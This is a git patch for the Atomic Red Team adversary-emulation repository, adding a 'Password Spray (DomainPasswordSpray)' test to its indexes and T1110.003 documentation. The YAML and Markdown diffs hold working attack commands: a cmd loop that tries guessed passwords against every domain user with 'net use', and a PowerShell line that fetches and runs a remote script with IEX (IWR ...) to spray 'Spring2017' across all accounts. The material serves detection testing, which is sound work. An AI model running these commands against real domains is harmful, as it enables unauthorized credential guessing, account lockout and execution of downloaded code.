From 5f4b9dba55c2cc7a7db8f0a575603823c7ab2048 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 1 Jul 2020 18:49:48 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 29 ++++++++++++++--
 atomics/T1110.003/T1110.003.md                | 33 +++++++++++++++++++
 atomics/T1110.003/T1110.003.yaml              |  1 +
 atomics/used_guids.txt                        |  1 +
 8 files changed, 65 insertions(+), 3 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e4f467af..a5209f37 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -188,6 +188,7 @@ credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
+credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 5d64bb8f..ddd04a85 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -418,6 +418,7 @@ credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
+credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 7a372883..45438c98 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -408,6 +408,7 @@
   - Atomic Test #1: Brute Force Credentials [windows]
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
   - Atomic Test #1: Password Spray all Domain Users [windows]
+  - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
   - Atomic Test #1: Private Keys [windows]
   - Atomic Test #2: Discover Private SSH Keys [macos, linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 233977fd..a79c0166 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -861,6 +861,7 @@
   - Atomic Test #1: Brute Force Credentials [windows]
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
   - Atomic Test #1: Password Spray all Domain Users [windows]
+  - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
   - Atomic Test #1: Private Keys [windows]
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3e0b7db6..b5837c12 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -18880,13 +18880,13 @@ credential-access:
           type: String
           default: YOUR_COMPANY
       executor:
+        name: command_prompt
         command: |
           net user /domain > #{input_file_users}
           echo "Password1" >> #{input_file_passwords}
           echo "1q2w3e4r" >> #{input_file_passwords}
           echo "Password!" >> #{input_file_passwords}
           @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
-        name: command_prompt
   T1110.003:
     technique:
       external_references:
@@ -18986,10 +18986,33 @@ credential-access:
         prereq_command: if not exist %temp%\users.txt (exit /b 1)
         get_prereq_command: PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
       executor:
+        name: command_prompt
+        elevation_required: false
         command: '@FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$
           /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password}
-          && @net use /delete %logonserver%\IPC$ > NUL'
-        name: command_prompt
+          && @net use /delete %logonserver%\IPC$ > NUL
+
+'
+    - name: Password Spray (DomainPasswordSpray)
+      auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
+      description: |
+        Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain
+
+        https://github.com/dafthack/DomainPasswordSpray
+      supported_platforms:
+      - windows
+      input_arguments:
+        domain:
+          description: Domain to brute force against
+          type: String
+          default: "(Get-ADDomain | Select-Object -ExpandProperty Name)"
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'IEX (IWR ''https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1'');
+          Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
+
+'
   T1552.004:
     technique:
       id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf
diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md
index f88a3295..d09895f7 100644
--- a/atomics/T1110.003/T1110.003.md
+++ b/atomics/T1110.003/T1110.003.md
@@ -25,6 +25,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
 
 - [Atomic Test #1 - Password Spray all Domain Users](#atomic-test-1---password-spray-all-domain-users)
 
+- [Atomic Test #2 - Password Spray (DomainPasswordSpray)](#atomic-test-2---password-spray-domainpasswordspray)
+
 
 <br/>
 
@@ -68,4 +70,35 @@ PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Password Spray (DomainPasswordSpray)
+Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain
+
+https://github.com/dafthack/DomainPasswordSpray
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| domain | Domain to brute force against | String | (Get-ADDomain | Select-Object -ExpandProperty Name)|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml
index ed49bcc4..5a97f94c 100644
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -34,6 +34,7 @@ atomic_tests:
       @FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL
 
 - name: Password Spray (DomainPasswordSpray)
+  auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
   description: |
     Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain
     
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 748b6f12..f399d74d 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -539,3 +539,4 @@ d9841bf8-f161-4c73-81e9-fd773a5ff8c1
 224f7de0-8f0a-4a94-b5d8-989b036c86da
 542bb97e-da53-436b-8e43-e0a7d31a6c24
 21748c28-2793-4284-9e07-d6d028b66702
+263ae743-515f-4786-ac7d-41ef3a0d4b2b